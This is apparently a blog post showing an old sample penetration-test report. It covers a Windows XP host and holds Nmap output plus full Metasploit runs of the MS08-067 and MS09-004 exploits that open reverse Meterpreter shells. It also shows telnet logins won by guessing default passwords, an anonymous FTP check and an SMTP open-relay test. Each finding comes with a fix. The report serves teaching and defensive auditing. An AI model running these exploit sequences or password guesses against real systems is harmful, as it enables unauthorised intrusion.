https://myexploit.wordpress.com/myexploit2600_security_conference_talks/
The below I made about 8 years ago, please don’t consider it to be of real use today ;0)
Title: Pentest Results
Date of Testing: 1433-02-01
Assigned To: Client A
Number of Critical issues: 2
Number of High issues: 4
Name of Tester: MyExploitHQ
——————————————————
Nmap Results:
root@bt:~# nmap -sS -sC -sV --open Client-IP-Address
Starting Nmap 5.61TEST4 ( http://nmap.org ) at 1433-02-01 12:19 BST
Nmap scan report for Client-IP-Address
Host is up (0.00033s latency).
Not shown: 990 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
23/tcp open telnet Microsoft Windows XP telnetd
25/tcp open smtp Microsoft ESMTP 6.0.2600.5512
| smtp-commands: PC.name.com Hello [Tester-IP-Address], SIZE 2097152, PIPELINING, DSN, ENHANCEDSTATUSCODES, 8bitmime, BINARYMIME, CHUNKING, VRFY, OK,
|_ This server supports the following commands: HELO EHLO STARTTLS RCPT DATA RSET MAIL QUIT HELP AUTH BDAT VRFY
80/tcp open http Microsoft IIS httpd 5.1
|_http-title: Directory Listing Denied
| http-methods: Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
|_See http://nmap.org/nsedoc/scripts/http-methods.html
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
443/tcp open https?
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
1027/tcp open msrpc Microsoft Windows RPC
1433/tcp open ms-sql-s Microsoft SQL Server 2005 9.00.1399.00; RTM
MAC Address: 01:02:03:0a:0b:0c (Mickey Systems)
Service Info: Host: PC.name.com; OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
Host script results:
|_nbstat: NetBIOS name: PC, NetBIOS user: , NetBIOS MAC: 01:02:03:0a:0b:0c (Mickey Systems)
|_smbv2-enabled: Server doesn't support SMBv2 protocol
| smb-security-mode:
| Account that was used for smb scripts: guest
| User-level authentication
| SMB Security: Challenge/response passwords supported
|_ Message signing disabled (dangerous, but default)
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| Computer name: PC
| Domain name: name.com
| Forest name: name.com
| FQDN: PC.name.com
| NetBIOS computer name: PC
| NetBIOS domain name: name
|_ System time: 1433-02-01 12:19:39 UTC+1
| ms-sql-info:
| Windows server name: PC
| [Client-IP-Address\SQLEXPRESS]
| Instance name: SQLEXPRESS
| Version: Microsoft SQL Server 2005 RTM
| Version number: 9.00.1399.00
| Product: Microsoft SQL Server 2005
| Service pack level: RTM
| Post-SP patches applied: No
| TCP port: 1433
|_ Clustered: No
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.11 seconds
------------------------------------------------------
Manual testing:
------------------------------------------------------
Microsoft Security Bulletin MS08-067 - Critical
Vulnerability in Server Service Could Allow Remote Code Execution (958644
1. Windows XP + 445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds = metasploit-ms08_067_netapi
msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set lhost Tester-IP-Address
msf exploit(ms08_067_netapi) > set rhost Client-IP-Address
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on Tester-IP-Address:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to Client-IP-Address
[*] Meterpreter session 1 opened (Tester-IP-Address:4444 -> Client-IP-Address:1046) at 1433-02-01 12:23:29 +0100
meterpreter > shell
Process 3728 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
Priority: Critical
Recommendation: Apply the MS08-067 update immediately and review and install all other security updates as recommended by vendor.
------------------------------------------------------
Microsoft Security Bulletin MS09-004 - Important
Vulnerability in Microsoft SQL Server Could Allow Remote Code Execution (959420)
2. 1433/tcp open ms-sql-s Microsoft SQL Server 2005 9.00.1399.00; RTM = metasploit-mssql-ms09_004_sp_replwritetovarbin
msf exploit(ms09_004_sp_replwritetovarbin) > use exploit/windows/mssql/ms09_004_sp_replwritetovarbin
msf exploit(ms09_004_sp_replwritetovarbin) > set lhost Tester-IP-Address
msf exploit(ms09_004_sp_replwritetovarbin) > set rhost Client-IP-Address
msf exploit(ms09_004_sp_replwritetovarbin) > exploit
[*] Started reverse handler on Tester-IP-Address:4444
[*] Attempting automatic target detection...
[*] Automatically detected target "MSSQL 2005 SP0 (9.00.1399.06)"
[*] Redirecting flow to 0x10e860f via call to our faked vtable ptr @ 0x2201ca8
[*] Sending stage (752128 bytes) to Client-IP-Address
[*] Meterpreter session 2 opened (Tester-IP-Address:4444 -> Client-IP-Address:1053) at 1433-02-01 12:26:12 +0100
meterpreter > shell
Process 2324 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
Priority: Critical
Recommendation: Apply the MS09-004 update immediately and review and install all other security updates as recommended by vendor.
------------------------------------------------------
3. Testing for HTTP Methods and XST (OWASP-CM-008)
Nmap discoverd 80/tcp open http Microsoft IIS httpd 5.1
|_http-title: Directory Listing Denied
| http-methods: Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPA
root@bt:~# telnet Client-IP-Address 80
Trying Client-IP-Address...
Connected to Client-IP-Address.
Escape character is '^]'.
OPTIONS / HTTP/1.1
Host: Client-IP-Address
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.1
Date: Thu, 01 Jan 1433 11:36:38 GMT
MS-Author-Via: DAV
Content-Length: 0
Accept-Ranges: none
DASL:
DAV: 1, 2
Public: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
Allow: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
Cache-Control: private
Testing Trace proves positive as seen bellow by the response mirroring Host: Client-IP-Address in the reply.
root@bt:~# telnet Client-IP-Address 80
Trying Client-IP-Address...
Connected to Client-IP-Address.
Escape character is '^]'.
TRACE / HTTP/1.1
Host: Client-IP-Address
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.1
Date: Thu, 01 Jan 1433 11:38:37 GMT
Content-Type: message/http
Content-Length: 42
TRACE / HTTP/1.1
Host: Client-IP-Address
Priority: High
Recommendation: Install Microsoft UrlScan Security Tool. The urlscan.ini file included as part of URLScan sets by default a configuration setting "UseAllowVerbs=1". In the [AllowVerbs] section of the ini file, http methods GET, HEAD, and POST are the only ones listed, so simply by installing URLScan, you are protected from TRACE or TRACK.
------------------------------------------------------
4. Testing Anonymous FTP
Nmap discoverd 21/tcp open ftp Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
Using Firefox browsing ftp://Client-IP-Address/ is not meet with any restrictions.
------------------------------------------------------
5. Using Metasploit to test FTP
msf > use auxiliary/scanner/ftp/anonymous
msf auxiliary(anonymous) > set rhosts Client-IP-Address
msf auxiliary(anonymous) > run
[*] Client-IP-Address:21 Anonymous READ (220 Microsoft FTP Service)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Priority: High
Recommendation: If FTP file share access is not required disable the service. If required restrict source IP address access to the service.
------------------------------------------------------
6. Testing telnet access
Nmap discoverd 23/tcp open telnet Microsoft Windows XP telnetd
root@bt:~# telnet Client-IP-Address
Trying Client-IP-Address...
Connected to Client-IP-Address.
Escape character is '^]'.
Welcome to Microsoft Telnet Service
login: administrator
password: password
Logon failure: unknown user name or bad password.
Login Failed
login: administrator
password: Password
Logon failure: unknown user name or bad password.
Login Failed
login: administrator
password: p@ssw0rd
*===============================================================
Welcome to Microsoft Telnet Server.
*===============================================================
C:\Documents and Settings\>C:\Documents and Settings\>
Priority: High
Recommendation: Enforce strong password policy. If remote command line access is required use SSH over telnet as traffic is encrypted.
------------------------------------------------------
7. Testing smtp access
Nmap discoverd 25/tcp open smtp Microsoft ESMTP 6.0.2600.5512
| smtp-commands: PC.name.com Hello [Tester-IP-Address], SIZE 2097152, PIPELINING, DSN, ENHANCEDSTATUSCODES, 8bitmime, BINARYMIME, CHUNKING, VRFY, OK,
|_ This server supports the following commands: HELO EHLO STARTTLS RCPT DATA RSET MAIL QUIT HELP AUTH BDAT VRFY
root@bt:~# telnet Client-IP-Address 25
Trying Client-IP-Address...
Connected to Client-IP-Address.
Escape character is '^]'.
220 PC.name.com Microsoft ESMTP MAIL Service, Version: 6.0.2600.5512 ready at Thu, 01 Jan 1433 13:27:19 +0100
helo
250 PC.name.com Hello [Tester-IP-Address]
mail from:test@mail-test.com
50 2.1.0 test@mail-test.com....Sender OK
rcpt to:test@frogme.com
250 2.1.5 test@frogme.com
data
354 Start mail input; end with .
subject: TEST
test
.
250 2.6.0 Queued mail for delivery
quit
221 2.0.0 PC.name.com Service closing transmission channel
Connection closed by foreign host.
Priority: High
Recommendation: Relay is enabled and requires to be restricted
Administrative Tools / Internet Information Services / local computer / Default SMTP Virtual Server – right click Properties / Access tab / Relay… (Options here)
If you see 550 5.7.1 Unable to relay for test@frogme.com = Relay set to Only list below. This will block the ability to send spam.
——————————————————
For more information:
https://myexploit.wordpress.com/information-gathering-nmap/
http://www.myexploit.wordpress.com/control-metasploit-ms08_067_netapi/
http://www.myexploit.wordpress.com/control-metasploit-auxiliary_scanner_http/
http://www.myexploit.wordpress.com/control-metasploit-ftp_login/
http://www.myexploit.wordpress.com/control-metasploit-mssql-ms09_004_sp_replwritetovarbin/
Awsome Man .. This is the best blog 🙂
It gave me a lot of info for my OSCP course.
Thanks Shinto myexploit appreciate feed back like this. Well done on doing the OSCP!